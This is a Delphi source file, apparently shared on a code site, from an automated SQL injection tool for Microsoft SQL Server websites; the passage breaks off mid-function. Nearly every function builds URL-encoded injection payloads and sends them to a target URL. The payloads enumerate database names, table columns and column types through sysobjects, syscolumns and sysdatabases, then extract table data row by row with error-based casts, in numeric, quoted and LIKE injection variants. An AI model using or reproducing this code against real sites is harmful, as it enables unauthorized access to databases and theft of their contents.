📄 cjdatabase_unit.pas
字号:
begin
Application.MessageBox(pchar('获取用户表列数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//*********************
try
result:=strtoint(sCount);
except
result:=0;
end;
//*********************
end;
//**********************************************************
//**********************************************************
//函数:获取一个表的列数
function GetColumnCountByDb(str_url:string;str_db:string;TableName:string):integer;
var
sCount:string;
str_ext:string;
URL:string;
begin
str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
+FDbName+']..[syscolumns]%20A,['+str_db+']..[sysobjects]%20B%20where%20A.id=B.id%20and%20B.name='''+TableName+''')>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
Application.MessageBox(pchar('获取用户表列数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//*********************
try
result:=strtoint(sCount);
except
result:=0;
end;
//*********************
end;
//**********************************************************
//函数:获取列的数据类型
function GetColumType(str_url:string;CName:string;TableName:string):string;
var
ColumName:string;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
//*********************
try
str_ext:='%20And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)'+
'%20from%20['+FDbName+']..[sysobjects]%20A,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20and%20B.name='''+CName+''')>0';
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
ColumName:=define_unit.GetURLMsg(URL);
if ColumName='127' then
ColumName:='bigint';
if ColumName='173' then
ColumName:='binary';
if ColumName='104' then
ColumName:='bit';
if ColumName='175' then
ColumName:='char';
if ColumName='61' then
ColumName:='datetime';
if ColumName='106' then
ColumName:='decimal';
if ColumName='175' then
ColumName:='empid';
if ColumName='62' then
ColumName:='float';
if ColumName='167' then
ColumName:='varchar';
if ColumName='34' then
ColumName:='image';
if ColumName='56' then
ColumName:='int';
if ColumName='60' then
ColumName:='money';
if ColumName='239' then
ColumName:='nchar';
if ColumName='99' then
ColumName:='ntext';
if ColumName='108' then
ColumName:='numeric';
if ColumName='231' then
ColumName:='nvarchar';
if ColumName='59' then
ColumName:='real';
if ColumName='58' then
ColumName:='smalldatetime';
if ColumName='52' then
ColumName:='smallint';
if ColumName='122' then
ColumName:='smallmoney';
if ColumName='98' then
ColumName:='sql_variant';
if ColumName='231' then
ColumName:='sysname';
if ColumName='35' then
ColumName:='text';
if ColumName='167' then
ColumName:='tid';
if ColumName='189' then
ColumName:='timestamp';
if ColumName='48' then
ColumName:='tinyint';
if ColumName='36' then
ColumName:='uniqueidentifier';
if ColumName='165' then
ColumName:='varbinary';
if ColumName='167' then
ColumName:='varchar';
result:= ColumName;
except
on E:exception do
begin
Application.MessageBox(pchar('获取用户表列数据类型时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
end;
//**********************************************************
function GetData(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
var
str:string;
str1:string;
str2:string;
str3:string;
str4:string;
str5:string;
str6:string;
str7:string;
str8:string;
str9:string;
i:integer;
str_msg:string;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str1:='And%20(select%20top%201%20';
str2:='char(94)%2Bcast('+ColumnName+'%20as%20varchar(8000))%2Bchar(94)'+'%20';
str3:='%20from%20(%20select%20top%20'+inttostr(iTop)+'%20';
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str4:=ColumnNames.Strings[i-1]
else
str4:=str4+','+ColumnNames.Strings[i-1];
end;
str5:='%20from%20['+FDbName+']..['+TableName+']%20order%20by%20';
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str6:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str6:=str6+','+ColumnNames.Strings[i-1]+'%20asc'
else
str6:=str6+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
str7:='%20)%20as%20as_TableName%20order%20by%20';
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str8:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str8:=str8+','+ColumnNames.Strings[i-1]+'%20desc'
else
str8:=str8+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
str9:='%20)>0';
str:=str1+str2+str3+str4+str5+str6+str7+str8+str9;
str_ext:=str;
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
str_msg:=define_unit.GetURLMsg(URL);
result:=str_msg;
except on E:Exception do
begin
Application.MessageBox(pchar('获取表数据时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
result:=str_msg;
end;
end;
//*********************
end;
//**********************************************************
//**********************************************************
function GetDataByDb(str_url:string;DbName:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
var
str:string;
str1:string;
str2:string;
str3:string;
str4:string;
str5:string;
str6:string;
str7:string;
str8:string;
str9:string;
i:integer;
str_msg:string;
str_ext:string;
URL:string;
begin
//*********************
str1:='And%20(select%20top%201%20';
str2:='char(94)%2Bcast('+ColumnName+'%20as%20varchar(8000))%2Bchar(94)'+'%20';
str3:='%20from%20(%20select%20top%20'+inttostr(iTop)+'%20';
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str4:=ColumnNames.Strings[i-1]
else
str4:=str4+','+ColumnNames.Strings[i-1];
end;
str5:='%20from%20['+DbName+']..['+TableName+']%20order%20by%20';
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str6:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str6:=str6+','+ColumnNames.Strings[i-1]+'%20asc'
else
str6:=str6+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
str7:='%20)%20as%20as_TableName%20order%20by%20';
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str8:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str8:=str8+','+ColumnNames.Strings[i-1]+'%20desc'
else
str8:=str8+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
str9:='%20)>0';
str:=str1+str2+str3+str4+str5+str6+str7+str8+str9;
str_ext:=str;
//*********************
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
str_msg:=define_unit.GetURLMsg(URL);
result:=str_msg;
except on E:Exception do
begin
Application.MessageBox(pchar('获取表数据时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
result:=str_msg;
end;
end;
//*********************
end;
//**********************************************************
function GetDatabaseName(str_url:string;iTop:integer):string;
var
i:integer;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
//Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
str_ext:='%20And%20(select%20top%201%20char(94)%2Bname%2Bchar(94)%20from%20(select%20top%20'
+inttostr(iTop)+'%20name,dbid%20from%20[master]..[sysdatabases]%20order%20by%20name%20asc,dbid%20desc%20)%20as%20T%20order%20by%20name%20desc,dbid%20asc)>0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -